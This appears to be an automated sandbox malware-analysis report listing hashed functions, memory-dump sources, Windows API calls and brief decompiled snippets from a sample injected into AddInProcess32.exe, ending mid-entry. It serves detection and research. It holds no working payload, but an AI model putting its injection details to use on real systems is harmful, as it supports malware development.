Instruction ID: e973562b654e8cfd909ad8ebf2bf7a6849d057f3e28b1bfa65781264afeb42db
Opcode Fuzzy Hash: cffae9f152c185ed4cbbfb723eaf9daa0ac6ef9fc8427b9608b7b987730a4c58
Instruction Fuzzy Hash: 17022A30A44109DFCB15CFA9D984AADBBF2FF89304F15C0A9E829AB261DB30DD41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B72648, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9714d3c0638174b3e3bc27264d5f7e8156ff870c9bf4fd86dd03a14c3ba5d30
Instruction ID: d8ac656a44fb614d8a71df38025565f19375f1d46743ac3f0809614fca43d418
Opcode Fuzzy Hash: c9714d3c0638174b3e3bc27264d5f7e8156ff870c9bf4fd86dd03a14c3ba5d30
Instruction Fuzzy Hash: ABB1A130704616CBDF381B2A855633B76E6AF84781F24D5ADD8AE86694DF30CC42DB62

Uniqueness

Uniqueness Score: -1.00%

Function 069C2790, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0864d234862fff1df855f1417bece61d8c2afa439ea29bd019c361152b60e8
Instruction ID: fc77f8455e2efa5012d5a1188fa8266e48fe5d17d1075ece21650d264e79cf61
Opcode Fuzzy Hash: 3f0864d234862fff1df855f1417bece61d8c2afa439ea29bd019c361152b60e8
Instruction Fuzzy Hash: 56D1CE74E04218CFDB54EFA9C984B9DBBB2FF88314F1085AAD409A7355EB309A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 069CCE38, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8574d7d6b630363ecea06aa1b6f5a6ba93af1203eebc374de260d354363d86
Instruction ID: c4a85b588def056bd68d635612881015dd5c9b5d8ed47d995d47236ee061bbcc
Opcode Fuzzy Hash: 3e8574d7d6b630363ecea06aa1b6f5a6ba93af1203eebc374de260d354363d86
Instruction Fuzzy Hash: 4FD1AE74D05218CFDB54CFA5D948BEEBBB2FB89301F10916AD809A7354EB385A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 069CCE28, Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b29bd418f1d7fd489f538b48ecb1a77ce03ca359fe657f425f17827aab2345
Instruction ID: 1c8b77a5ef04a838263fb310cbf8a6dd0fbd0c46778b239195e45e14786a10f4
Opcode Fuzzy Hash: 09b29bd418f1d7fd489f538b48ecb1a77ce03ca359fe657f425f17827aab2345
Instruction Fuzzy Hash: 14D1B074D04218CFDB54CFA5D948BEEBBB2FB89301F1091AAD809A7354EB385A85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 069C8308, Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2592abb3b9e617b1b167f4f46d19cd19d5ab177448ac10b917063ef99d4e3c44
Instruction ID: 6b00013f299250d5859568fbce6046d105cda5714cae26b2b2897db9ede363e1
Opcode Fuzzy Hash: 2592abb3b9e617b1b167f4f46d19cd19d5ab177448ac10b917063ef99d4e3c44
Instruction Fuzzy Hash: 23B15870E007089FCB14DFA8C894A9DBBF1FF89314F24852DE519BB695EB30A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 069C85F0, Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13f163c75868856d557ac3db13c39a1407431e33c286fb365c59e3e9c9562e9
Instruction ID: ad29395c40e7e5be7df6bec8619e5815981efb3f1d866819ca62ee3635395879
Opcode Fuzzy Hash: a13f163c75868856d557ac3db13c39a1407431e33c286fb365c59e3e9c9562e9
Instruction Fuzzy Hash: FDB1E174E006188FDB54DFA9C940A9DFBB2FF89314F20C1AAD419AB356EB309985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 069C2780, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 605387daf8195f77dee5161f4d50038ff57f6e79a24163057580f9efc6a95e22
Instruction ID: ad555f34eb6b8f3c3e1da245e60c4ffabc4e73f702cdde33bc4f4b170911cbe4
Opcode Fuzzy Hash: 605387daf8195f77dee5161f4d50038ff57f6e79a24163057580f9efc6a95e22
Instruction Fuzzy Hash: ACA1F074E04218CFDB54EFA9D984B9DFBB2FF88304F1084AAD449A7255EB305A89CF11

Uniqueness

Uniqueness Score: -1.00%

Function 069C83E8, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f44bc9439e560145788308d6ab1d75be1acfbd8cd31a31ec3c2da3d423f05e
Instruction ID: e6d6178970e0dbe4ed2947275adb8894c2fc80b741273611bdea823a8348c91b
Opcode Fuzzy Hash: d8f44bc9439e560145788308d6ab1d75be1acfbd8cd31a31ec3c2da3d423f05e
Instruction Fuzzy Hash: 6241C9B4D003489FDB10CFA9C984ADEBBF4BB09314F20902AE919BB354D774A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 069C6C8C, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23b4fd2d1e3270530050d80af7deb2348524f467ac23d27b283df406036f3a0
Instruction ID: 462247736bb180e37e4669a8c19c21611f74fe559e68cda91a8e254c4dd630b7
Opcode Fuzzy Hash: e23b4fd2d1e3270530050d80af7deb2348524f467ac23d27b283df406036f3a0
Instruction Fuzzy Hash: DF41D9B0D01248DFDB10CFA9C984ADEBBF0BB09314F20942AE408BB264CB74A949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 069C6750, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a60dff3eab6463bb91497fd88d8cf34f3f2fb7ec6af9b11888c57e66e9323920
Instruction ID: d9d4a2433c3a78181d1a914d550e11ad6ab95fb3211437b8d8a16e8824e37826
Opcode Fuzzy Hash: a60dff3eab6463bb91497fd88d8cf34f3f2fb7ec6af9b11888c57e66e9323920
Instruction Fuzzy Hash: 3941B9B0D053489FDB10CFA9C984ADEBBF0EB49314F20942AE505BB264DB74A949CF95

Uniqueness

Uniqueness Score: -1.00%

Function 069C7484, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27babb67f1c09ed0376d26bf34cdd8314f08941942fb9db494406d001d8a6d9c
Instruction ID: 420bf05eb80a251b56adb671ad9c0af93053c8f85e2dedde64897c1dbb3bc2fe
Opcode Fuzzy Hash: 27babb67f1c09ed0376d26bf34cdd8314f08941942fb9db494406d001d8a6d9c
Instruction Fuzzy Hash: B2218078D00208DFDB54CFAAD4446EDBBF1AB89320F20E52AE824BB790D7349945CF59

Uniqueness

Uniqueness Score: -1.00%

Function 069C7490, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92d953653c72e2fca64fd91db1f1b782f746615fe58dff161a1d67cfd0e57fc
Instruction ID: a96cb7b38b7649e1cb753b6487e5a1cec054a422f9c807c4db823ecd8526128f
Opcode Fuzzy Hash: e92d953653c72e2fca64fd91db1f1b782f746615fe58dff161a1d67cfd0e57fc
Instruction Fuzzy Hash: 98219274D04208DFDB54CFAAD4446EDBBF5BB49320F20E129E814BB250D7349941CF58

Uniqueness

Uniqueness Score: -1.00%

Function 069CDED8, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9cf72245da38539648be9c8cd35dfdf3857b2c569a3b0654852eaf8842e066
Instruction ID: ee24f065be2a4f3c1b1039f28cc2af10849da974655d62581471dd950f0d5981
Opcode Fuzzy Hash: fa9cf72245da38539648be9c8cd35dfdf3857b2c569a3b0654852eaf8842e066
Instruction Fuzzy Hash: 0E011270C092489FCB45DFB8D8542AEBFB0FF06208F2080AAC444A3295D7344A09DB96

Uniqueness

Uniqueness Score: -1.00%

Function 069C857C, Relevance: 1.8, APIs: 1, Instructions: 273COMMON

Download Yara Rule

APIs

CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 069CE279

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: a8ee280a69797a8a2aa4f87d794462af35002385c0e4ac5abf15e66b16d76710
Instruction ID: 3a2df8430591431c8c0fb6fe9626a997034994e5d710eff623f784ee2a6aa7f6
Opcode Fuzzy Hash: a8ee280a69797a8a2aa4f87d794462af35002385c0e4ac5abf15e66b16d76710
Instruction Fuzzy Hash: 80C1E070E04218CFDB64CFA9C881B9DBBB2BF49314F2481A9E409B7751DB34AA85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 069CDFCE, Relevance: 1.8, APIs: 1, Instructions: 261COMMON

Download Yara Rule

APIs

CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 069CE279

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: bf7b0ec87b10d1f198dff7917f956ff7817cc6d76805d983c9b71d3212ce00d3
Instruction ID: b8d27d5b719e8d7ffe25d6e69b6643c2a213d507faf9cdeadc978500cc9a18e4
Opcode Fuzzy Hash: bf7b0ec87b10d1f198dff7917f956ff7817cc6d76805d983c9b71d3212ce00d3
Instruction Fuzzy Hash: CCB1F174E00218CFDB24CFA8C985B9EBBB2BF49314F1485A9E409B7751DB34AA85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 069C1580, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 069C162F

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e0e70d7bb6a63e26d5b0c89c69b7be3675a1f84d521c464744df1857eaaa872a
Instruction ID: 35bd5d2c209c5888423d7f5ab96f06b95e5268c321612623cb98ee374ed46b24
Opcode Fuzzy Hash: e0e70d7bb6a63e26d5b0c89c69b7be3675a1f84d521c464744df1857eaaa872a
Instruction Fuzzy Hash: 803199B9D052589FCB10CFA9D584ADEFBB1BF19320F14902AE824B7310D735A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D399, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00B7D447

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7ca37dd14f9d3082f10afc86cfd79bb1ffa552281dc55a6e179c149d0741a397
Instruction ID: a5c3354e143d0ca8a83b1a7188818ba27d5d093f08acc0ee1f0a4914c1066fa3
Opcode Fuzzy Hash: 7ca37dd14f9d3082f10afc86cfd79bb1ffa552281dc55a6e179c149d0741a397
Instruction Fuzzy Hash: F231A6B9D042589FCB10CFA9E584AEEFBB0AF09310F14902AE829B7310D734A945DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D3A0, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00B7D447

Memory Dump Source

Source File: 00000000.00000002.356116837.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 29c1abe4ef1b0d5a2648736bc475ef70a20766a9bb3805707f3dddace26da55b
Instruction ID: aca508ee34ee34b2da1863dc70dc0d38674ddb2354bfbab9b16220eeb80a606c
Opcode Fuzzy Hash: 29c1abe4ef1b0d5a2648736bc475ef70a20766a9bb3805707f3dddace26da55b
Instruction Fuzzy Hash: 643197B9D042589FCB10CFAAE884ADEFBF0AF09310F14902AE819B7310D774A945DF64

Uniqueness

Uniqueness Score: -1.00%

Function 069C1588, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 069C162F

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 656c8c93d0203e30705b85b0103fed79b121353c8d42d19e1543a561689e9df0
Instruction ID: 0768815010e6b46178fd87f8fe7e52fe3876fdf0cf515a483d150ad124f6ce4a
Opcode Fuzzy Hash: 656c8c93d0203e30705b85b0103fed79b121353c8d42d19e1543a561689e9df0
Instruction Fuzzy Hash: C13197B9D042589FCB10CFA9D984ADEFBB4BB19320F14902AE814B7310D734A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069C1CE9, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 069C1D89

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ec711a4b50df761d08c4c85de5cdf6f90e7e278b01404c4d7ef3c6d465a967f8
Instruction ID: 098e82d1665ecc9a942b26c36a707ec3b526f3fb86e847f5bc97f4385dd496c5
Opcode Fuzzy Hash: ec711a4b50df761d08c4c85de5cdf6f90e7e278b01404c4d7ef3c6d465a967f8
Instruction Fuzzy Hash: A531DBB4D012589FDB00CFA9D984AEEFBF1AB49324F14802AE404B7210D734AA46CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069C1CF0, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 069C1D89

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5132fb269c8dc98665a02157415c19d78e3084b4a4de602044b8e7ddb01c60f5
Instruction ID: 64acdbad909e2ea2c9e72d4f0f9a2bc7c63ecd8ca176fdcd5571b8288f8ab79f
Opcode Fuzzy Hash: 5132fb269c8dc98665a02157415c19d78e3084b4a4de602044b8e7ddb01c60f5
Instruction Fuzzy Hash: E931BAB4D01258DFCB00CFAAD884AEEFBF5AB49324F14806AE405B7210D734AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0089D4EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355943860.000000000089D000.00000040.00000001.sdmp, Offset: 0089D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb79fd73676ef32643b306ddf259695b979583feee8eaae2110b523d16ae1e7
Instruction ID: 03a686e2edb74f5340baa3bc9ae285a0230ed98c475f5701de7a9220ac83d088
Opcode Fuzzy Hash: 5cb79fd73676ef32643b306ddf259695b979583feee8eaae2110b523d16ae1e7
Instruction Fuzzy Hash: 04210AB1504344DFDF05EF10D9C0B2ABF65FB98328F29C569E9058B246C336D856D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0089D4E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355943860.000000000089D000.00000040.00000001.sdmp, Offset: 0089D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction ID: a96544b57d0927395981f9bd447fbb753fc03f8af4f0aa9e94b8a48af5006b80
Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction Fuzzy Hash: F611AF76904284CFCF05DF10D9C4B16BF72FB98324F28C6A9D8054B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0089D821, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355943860.000000000089D000.00000040.00000001.sdmp, Offset: 0089D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4daf6432c9d72001205eaf4cfa02fc355a36e0984553614b4984d534f3098958
Instruction ID: de125f1e522a57b4e6145c86962246edfd017de0c58088d4f8d3b06a7d1717a2
Opcode Fuzzy Hash: 4daf6432c9d72001205eaf4cfa02fc355a36e0984553614b4984d534f3098958
Instruction Fuzzy Hash: F2012B714083849AEF105A16CC80766BB98FF41378F1CC86AED04AB247C3789C44D6B5

Uniqueness

Uniqueness Score: -1.00%

Function 0089D820, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355943860.000000000089D000.00000040.00000001.sdmp, Offset: 0089D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81355e2d175fcb684b1ed932d9a48582d44bd6d01f4068f14e12b439cb40ac31
Instruction ID: 7123ef196bcff7400145e1bba8c466d5f2202c7ee06a17d9b84294401b804128
Opcode Fuzzy Hash: 81355e2d175fcb684b1ed932d9a48582d44bd6d01f4068f14e12b439cb40ac31
Instruction Fuzzy Hash: 01F06271409384AEEB108A16CCC4B62FF98EB55774F18C45AED485B287D3789C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 069C7C10, Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d1e9f31c0e191ff9b7e1bb79e27560f242c00c3e87820d1cf62aa652d2b6ea7
Instruction ID: 153f3bc39c09ddb0466c95edc22bb8fd4986dcb04a6d0837f935d3d4fb464144
Opcode Fuzzy Hash: 7d1e9f31c0e191ff9b7e1bb79e27560f242c00c3e87820d1cf62aa652d2b6ea7
Instruction Fuzzy Hash: B7E11930811B5A8ACB10EBA4D890ADDB771FFA6300F51D79AD40977225EB706AC9CF91

Uniqueness

Uniqueness Score: -1.00%

Function 069C7C48, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d1be6c88f995eafe16da69ab24c21eee5673f17ab0350be7ea5a4c55cedc24c
Instruction ID: 3c45f19b9aa360fc9f690840e4a0753ba7f2c07a231f3cd979a23fe2b2e78c89
Opcode Fuzzy Hash: 8d1be6c88f995eafe16da69ab24c21eee5673f17ab0350be7ea5a4c55cedc24c
Instruction Fuzzy Hash: 1AD1FA31D21B5A8ACB10EFA4D850A9DB371FFA6300F51D79AD40977224EB706AC9CF91

Uniqueness

Uniqueness Score: -1.00%

Function 069C7164, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e52997906bade79a1201aa654511cfc14f6487b0c2867a8f19be6ae0cdd2a6
Instruction ID: ab3ba7e48c519ee03b08c8920822e9212c4f33b433815642f04c6e8568232163
Opcode Fuzzy Hash: 61e52997906bade79a1201aa654511cfc14f6487b0c2867a8f19be6ae0cdd2a6
Instruction Fuzzy Hash: 57318DB4D05208DFDB55CFA9D884AEDBFB2BB49360F24912AE814B7354C3349981CF55

Uniqueness

Uniqueness Score: -1.00%

Function 069C7170, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e07749c396d0e65342e14e7688149e26618a8a57ccc19b33a14fc6acf0240c7
Instruction ID: 983bc9523bc533aabf5ff4834ada29d637dd748ffe7ff36f46ff31c84d988ca1
Opcode Fuzzy Hash: 3e07749c396d0e65342e14e7688149e26618a8a57ccc19b33a14fc6acf0240c7
Instruction Fuzzy Hash: 4B3160B4D05208DFCB54CFA9D884AEDBBF1BB49360F249129E814B7350D7349941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 069C73BC, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd924f9101c1b6e7b6ed49d82a03763754682261a8b81cba215165469c51e40e
Instruction ID: 2aa7cb51c97ec0e8de96ea9ce402e239cf4c777cc951241f0c18966bc4c3424f
Opcode Fuzzy Hash: dd924f9101c1b6e7b6ed49d82a03763754682261a8b81cba215165469c51e40e
Instruction Fuzzy Hash: 25F074B4D052089F8F04DFE9D9414EEFBF2AB5A311F10A12AD815B7314E7308911CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 069C73C8, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.361079524.00000000069C0000.00000040.00000001.sdmp, Offset: 069C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: 5b92be049da872d4bb0700acd0192bebb3a679530b4454edd64a32bd01b4c1b2
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: E6F042B5D0520C9F8F04DFA9D5418EEFBF2AB59310F10A16AE814B7314E73599518FA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exe PID: 6460 Parent PID: 1212 AddInProcess32.exeCOMMON

Executed Functions

Function 00419E1A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E1A(void* __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				_t16 = _a4;
				_t33 = _a4 + 0xc48;
				E0041A970(__edi, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t7 =  &_a32; // 0x414d42
				_t13 =  &_a8; // 0x414d42
				_t21 =  *((intOrPtr*)( *_t33))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t32, _t35); // executed
				return _t21;
			}

0x00419e23
0x00419e2f
0x00419e37
0x00419e42
0x00419e5d
0x00419e65
0x00419e69

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E65

Strings

BMA, xrefs: 00419E42, 00419E50
BMA, xrefs: 00419E5D, 00419E64

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 4f55af73c15313b41fcab5863838c62b00725894ff8c2ff92fefb79fb8ed144e
Instruction ID: 0592b6d68f627f00d96299a5ef3adcb7a350d644e76e3be560a4c4697ea9d191
Opcode Fuzzy Hash: 4f55af73c15313b41fcab5863838c62b00725894ff8c2ff92fefb79fb8ed144e
Instruction Fuzzy Hash: 0AF0F4B2200108AFCB14DF99DC90EEB77ADEF8C754F168648FA5D97251DA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E20(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A970(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e23
0x00419e2f
0x00419e37
0x00419e42
0x00419e5d
0x00419e65
0x00419e69

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E65

Strings

BMA, xrefs: 00419E42, 00419E50
BMA, xrefs: 00419E5D, 00419E64

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 476f5ca6c1c8a702652738fcb96128002e75f3d9711df63c28b58529865989e9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: BCF0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248BA0D97241C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
Instruction ID: 201280aab8f5eb3f9a78e4804a46a8fe5c00921239f195b3ae597ca63712bd74
Opcode Fuzzy Hash: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
Instruction Fuzzy Hash: 100152B5D4020DB7DB10DAA5DC46FDEB7789F54308F0041A9E909A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 00419D70, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DBD

Memory Dump Source

Source File: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 25fb7c75c950e795cab2cc759816c0849ff70043d466e737eb5d68fc7603115a
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 90F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F50, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

